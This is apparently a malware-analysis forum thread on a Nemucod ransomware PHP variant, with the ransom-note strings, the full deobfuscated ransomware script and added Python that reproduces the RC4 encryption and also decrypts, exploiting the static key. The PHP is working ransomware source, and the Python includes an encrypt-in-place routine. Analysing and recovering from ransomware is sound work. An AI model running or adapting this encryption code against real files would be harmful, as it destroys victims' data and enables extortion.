xors wrote:
Hello all,
The dropper is a .wsf file. The dropper downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.
It's the latest Nemucod ransomware PHP variant, the one which uses RC4 encryption. The deobfuscated script is below:
<?php
set_time_limit(0);                  // never time out while walking the disk
ini_set("display_errors", "Off");   // stay silent on any error
// Walk every drive letter from C: to Z: that exists
for ($i = 67; $i <= 90; $i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");

function Tree($p) {
    $s = chr(92);   // backslash, used as path separator
    // Static 30-byte RC4 key, base64-encoded; the same key for every victim
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";       // mode switch: "e" = encrypt target files, "d" = decrypt .crypted files
    // Skip OS, program, temp and cache directories plus the recycle bin
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    // Note: readdir() returns the string "0" for an entry named "0", which is falsy in PHP, so the loop stops early there
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);   // recurse into subdirectories
        // Encrypt mode: match the target extension list; decrypt mode: match .crypted files
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);   // make sure the file is writable
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);   // only the first 2048 bytes of the file are ever touched
                // RC4 key-scheduling algorithm (KSA): permute a 256-byte state with the key
                $z = array();
                for ($i = 0; $i < 256; $i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0; $i < 256; $i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k)])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                // RC4 pseudo-random generation (PRGA): XOR one keystream byte into each buffered byte
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0; $y < strlen($b); $y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c .= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);   // overwrite the header in place
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");   // append the marker extension
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));   // strip it again
                }
            }
        }
    }
    closedir($dp);
}
BR,
Antelox
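The script above does not use the "strong RSA-1024 algorithm with a unique key" the ransom note advertises: it runs RC4 with a key that is hard-coded in the script ($k) over the first 2048 bytes of each file and appends .crypted. Since RC4 is symmetric and the key is static, the same operation restores the files, which is exactly what the script's own "d" branch does. The following Python is an added example, not code from either post and not Nemucod's code: it reimplements the per-file operation with the key taken from the script, includes a decryptor for .crypted files, checks the RC4 routine against the standard "Key"/"Plaintext" test vector, and round-trips a constructed sample file in a temporary directory. The file name report.pdf and the sample contents are constructed for the demo.

```python
import base64
import os
import tempfile

# Key lifted verbatim from the deobfuscated script above ($k): a static 30-byte RC4 key.
NEMUCOD_KEY = base64.b64decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs")
HEADER_LEN = 2048        # the script reads, transforms and writes back only fread($fp, 2048)
MARKER = ".crypted"      # suffix the script appends after encrypting


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4, mirroring the PHP loops: KSA over a 256-byte state, then PRGA XORed over data."""
    S = list(range(256))
    j = 0
    for i in range(256):                  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for byte in data:                     # pseudo-random generation, one keystream byte per input byte
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


def nemucod_transform(contents: bytes, key: bytes = NEMUCOD_KEY) -> bytes:
    """The script's per-file operation: RC4 over the first 2048 bytes, everything after left untouched.
    RC4 is symmetric, so the same call encrypts a clean file and decrypts a .crypted one."""
    return rc4(key, contents[:HEADER_LEN]) + contents[HEADER_LEN:]


def encrypt_file_like_script(path: str) -> str:
    """Reproduce the 'e' branch on one file: rewrite its header in place and append .crypted."""
    with open(path, "rb") as fp:
        data = fp.read()
    with open(path, "wb") as fp:
        fp.write(nemucod_transform(data))
    new_path = path + MARKER
    os.rename(path, new_path)
    return new_path


def restore_crypted_file(path: str) -> str:
    """Decrypt one .crypted file in place and strip the marker, as the script's 'd' branch would."""
    if not path.endswith(MARKER):
        raise ValueError("not a %s file: %s" % (MARKER, path))
    with open(path, "rb") as fp:
        data = fp.read()
    with open(path, "wb") as fp:
        fp.write(nemucod_transform(data))
    original = path[:-len(MARKER)]
    os.rename(path, original)
    return original


def rc4_known_answer() -> bytes:
    """Standard RC4 test vector (key 'Key', plaintext 'Plaintext') to validate rc4() independently."""
    return rc4(b"Key", b"Plaintext")


def demo_roundtrip() -> dict:
    """Constructed sample: a fake PDF larger than 2048 bytes in a temp dir, hit with the script's logic, then restored."""
    sample = b"%PDF-1.4\n" + bytes(range(256)) * 20   # constructed test data, 5129 bytes
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "report.pdf")        # hypothetical victim file name
    with open(path, "wb") as fp:
        fp.write(sample)

    crypted = encrypt_file_like_script(path)
    with open(crypted, "rb") as fp:
        damaged = fp.read()
    restored = restore_crypted_file(crypted)
    with open(restored, "rb") as fp:
        recovered = fp.read()
    os.remove(restored)
    os.rmdir(workdir)

    return {
        "crypted_name": os.path.basename(crypted),
        "header_changed": damaged[:HEADER_LEN] != sample[:HEADER_LEN],
        "tail_untouched": damaged[HEADER_LEN:] == sample[HEADER_LEN:],
        "restored_name": os.path.basename(restored),
        "recovered_ok": recovered == sample,
    }


if __name__ == "__main__":
    print("RC4 KAT:", rc4_known_answer().hex())   # bbf316e8d940af0ad3
    for name, value in demo_roundtrip().items():
        print(name, value)
```

Because only the first 2048 bytes are rewritten, everything past that offset in a .crypted file is still plaintext even before decryption, which is worth knowing when triaging which files were hit. The decryptor assumes the file was processed exactly once by this variant with this key; a sample using a different $k needs that key substituted.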